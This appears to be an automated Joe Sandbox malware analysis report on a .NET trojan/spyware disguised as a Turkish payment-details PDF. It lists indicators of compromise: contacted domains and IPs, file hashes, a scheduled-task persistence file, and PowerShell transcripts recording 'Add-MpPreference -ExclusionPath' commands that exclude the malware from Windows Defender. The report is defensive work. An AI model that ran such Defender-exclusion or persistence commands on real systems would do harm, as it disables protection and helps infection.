                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://oZi3Kd9J6L9d6D.org0%Avira URL Cloudsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    yapaszincir.com.tr
                    78.135.65.4
                    truetrue
                      unknown
                      mail.yapaszincir.com.tr
                      unknown
                      unknowntrue
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1#U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://www.apache.org/licenses/LICENSE-2.0#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.com#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designersG#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designersJHZH#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.374698181.0000000006100000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.374796647.0000000006100000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/?#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bThe#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://HuLJDa.com#U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com/designers?#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://purl.r#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.433081371.00000000060A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://yapaszincir.com.tr#U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.627600221.000000000370B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www#U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://en.wikipep#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.365039574.00000000060C6000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.365091666.00000000060C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.tiro.comJ#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.364650790.00000000060E1000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.364721712.00000000060E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designers/J#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.368187688.0000000006100000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.tiro.com#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.369548344.0000000006100000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designerskH;H#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.374601381.0000000006100000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.374860903.0000000006100000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.374698181.0000000006100000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.374796647.0000000006100000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.369260326.0000000006100000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.goodfont.co.kr#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://en.w#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.366108384.00000000060D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://mail.yapaszincir.com.tr#U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.627600221.000000000370B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.carterandcone.coml#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sajatypeworks.com#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.typography.netD#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlN#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/cThe#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htm#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://fontfabrik.com#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.founder.com.cn/cn#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers-#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.368458467.0000000006100000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.368474145.0000000006100000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designers/frere-jones.html#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.monotype.#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.368215300.00000000060D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://DynDns.comDynDNSnamejidpasswordPsi/Psi#U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.galapagosdesign.com/DPlease#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers8#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://oZi3Kd9J6L9d6D.org#U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.627600221.000000000370B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fonts.com#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.sandoll.co.kr#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.urwpp.deDPlease#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.zhongyicts.com.cn#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.427513871.0000000002F91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.sakkal.com#U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      78.135.65.4
                                                      yapaszincir.com.trTurkey
                                                      42910PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRtrue
                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:612096
                                                      Start date and time: 20/04/202215:06:382022-04-20 15:06:38 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 10m 36s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:#U00d6DEME DETAYLARI_PDF.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:23
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@12/11@2/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 0.6% (good quality ratio 0.5%)
                                                      • Quality average: 70%
                                                      • Quality standard deviation: 29.7%
                                                      HCA Information:
                                                      • Successful, ratio: 99%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, query.prod.cms.rt.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      TimeTypeDescription
                                                      15:07:54API Interceptor553x Sleep call for process: #U00d6DEME DETAYLARI_PDF.exe modified
                                                      15:08:03API Interceptor68x Sleep call for process: powershell.exe modified
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1308
                                                      Entropy (8bit):5.345811588615766
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                      MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                      SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                      SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                      SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):22164
                                                      Entropy (8bit):5.595570734081159
                                                      Encrypted:false
                                                      SSDEEP:384:UtCDiq0Di4Ir09qRSsSYJndSjultIIA7nvPg3hInoML+ufmAV7LzdS5ZQvnI++eg:RYqgspJICltTc66TKypA+4
                                                      MD5:916A3A38F646A85FA2972DBFAD4BD523
                                                      SHA1:A0E9DB47155063412C1404FDC1702F60FDB7F8ED
                                                      SHA-256:DD352C8A50FBD726A02073EE3551E340600160B5AE99FF44948F9191040F27CE
                                                      SHA-512:B3BDF5D99FF39632D167FA812493C85FC7CDA5B34E7C8B3838A9C47F771640F15E1FD07BFC0989898ADCA2B835A3091003A0C064679779AFC94A976A1CDC1950
                                                      Malicious:false
                                                      Preview:@...e...........^.......H.W...............*..........@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1606
                                                      Entropy (8bit):5.111337900744764
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh/S1K2ky1mo2dUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLMxvn:cgea6YrFdOFzOzN33ODOiDdKrsuTAv
                                                      MD5:88D1D0FAF79875FF4308D4017C81B035
                                                      SHA1:86B3CF5FFE73C6A153519BEA3AF40B60D800B3D1
                                                      SHA-256:379C94DBBDE05A433DB93BEA98051E42C5E068BF6379A21689C27FD5E8A97008
                                                      SHA-512:063DCA005AC57605D5DD9FBB90A9D310327F0B7251A0D864C00F7480BDE8525786B882AEDFA54BF3D284528C9A3C6BCA94E05A68D1F1F3C7B5FD8E59047E4307
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailab
                                                      Process:C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1051136
                                                      Entropy (8bit):7.905518721804451
                                                      Encrypted:false
                                                      SSDEEP:24576:2SUFciKmpg3PdOgYzo97yYs2211/eEFbS8e:psciOPdwsyYsze8e
                                                      MD5:55F4EDC3A387F831D2FEE28C7F6464D9
                                                      SHA1:2EDE67420207DD8A0C8284941032BD32A6C49C20
                                                      SHA-256:16395A650DF60656B26E6DC7A6674C64A6348B5D24A93F171D8627C501698E61
                                                      SHA-512:E4EDF7043E843418A40624B1DB528DE16F68F96FF2A8B15D795E1BE1E512DA6655AF0D4FE7FC5248A62E0860F7596EDE05A8F959494091A5CB0637B79D3A6575
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`^b..............0.............~2... ...@....@.. .......................`............@.................................02..K....@.......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......@......................@..B................`2......H........p...?..........8.................................................{....*J8....*..}....8.......{....*6..}....8....*....{....*J8....*..}....8......0..n.......(....8.....(....8*...8........E........8.....*.."....(....8.......(....(....8......"....(.... .....:....&8.......0............(......8......*8....8......0.. .......8....8....8......(......8......*&~.......*...~....*..0..........(....8.....(....8V...8........E............8......8V...8{....*....(.... .....:....& ....
                                                      Process:C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):3594
                                                      Entropy (8bit):5.381325094737677
                                                      Encrypted:false
                                                      SSDEEP:96:BZVTLINSiqDo1ZMAGuZkTLINSiqDo1ZmqGCGc0cGc0cGc09ZC:sFF1
                                                      MD5:CC3ECFD5159140D71A4CF9E5D5FE5C56
                                                      SHA1:C6C4A8294989B65535B48282E4287AE8A29A0D79
                                                      SHA-256:603F00DD79AE54C7910ADAFDD4EF5C1AD89BCB05F1B38574745C8BF7B31B61CF
                                                      SHA-512:E38A013730C707350DADE2D4D88CD2AFD376D4D5FE6708C2F79CD0D137EA9118DCFB9C186BB61267F584D5B9F0C74636D5CDF30C314983DB99A7FF3EA15D0B73
                                                      Malicious:false
                                                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220420150803..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 936905 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe..Process ID: 5588..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220420150803..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe..**********************..Command start time: 20220420151036..**********************..PS>TerminatingError(Add-MpPreference): "A posi
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):5807
                                                      Entropy (8bit):5.365707605732741
                                                      Encrypted:false
                                                      SSDEEP:96:BZBTLINR3qDo1ZXZjTLINR3qDo1ZJNOsGjZHTLINR3qDo1ZoD22vZM:31
                                                      MD5:ED0B8035D9990B200F5A22EA5A3B439D
                                                      SHA1:040BFE6B198779324CD0053983D4D444217A57D1
                                                      SHA-256:986D00D484B20A370D6C28363BD6209FFCAC5D5A820A669F4E1CFDA944A87296
                                                      SHA-512:CF346202936D00508064D80820151556913B561018DA6358C55817949CE0ACAACE192D59302E474BF64F0D880B0C1B1947F91772562CC443010D4EEA911E6139
                                                      Malicious:false
                                                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220420150807..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 936905 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\OsAcNRt.exe..Process ID: 5640..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220420150807..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\OsAcNRt.exe..**********************..Windows PowerShell transcript start..Start time: 20220420151143..Username: computer\user..RunAs User: DESKTOP-716
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.905518721804451
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:#U00d6DEME DETAYLARI_PDF.exe
                                                      File size:1051136
                                                      MD5:55f4edc3a387f831d2fee28c7f6464d9
                                                      SHA1:2ede67420207dd8a0c8284941032bd32a6c49c20
                                                      SHA256:16395a650df60656b26e6dc7a6674c64a6348b5d24a93f171d8627c501698e61
                                                      SHA512:e4edf7043e843418a40624b1db528de16f68f96ff2a8b15d795e1be1e512da6655af0d4fe7fc5248a62e0860f7596ede05a8f959494091a5cb0637b79d3a6575
                                                      SSDEEP:24576:2SUFciKmpg3PdOgYzo97yYs2211/eEFbS8e:psciOPdwsyYsze8e
                                                      TLSH:82251213722394F2E53E1233ED93440DA3A27EE5A553C64F2AC7F24A29317D64E499B3
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`^b..............0.............~2... ...@....@.. .......................`............@................................
                                                      Icon Hash:c4c4f4ecccec94a0
                                                      Entrypoint:0x4f327e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x625E60F4 [Tue Apr 19 07:12:52 2022 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
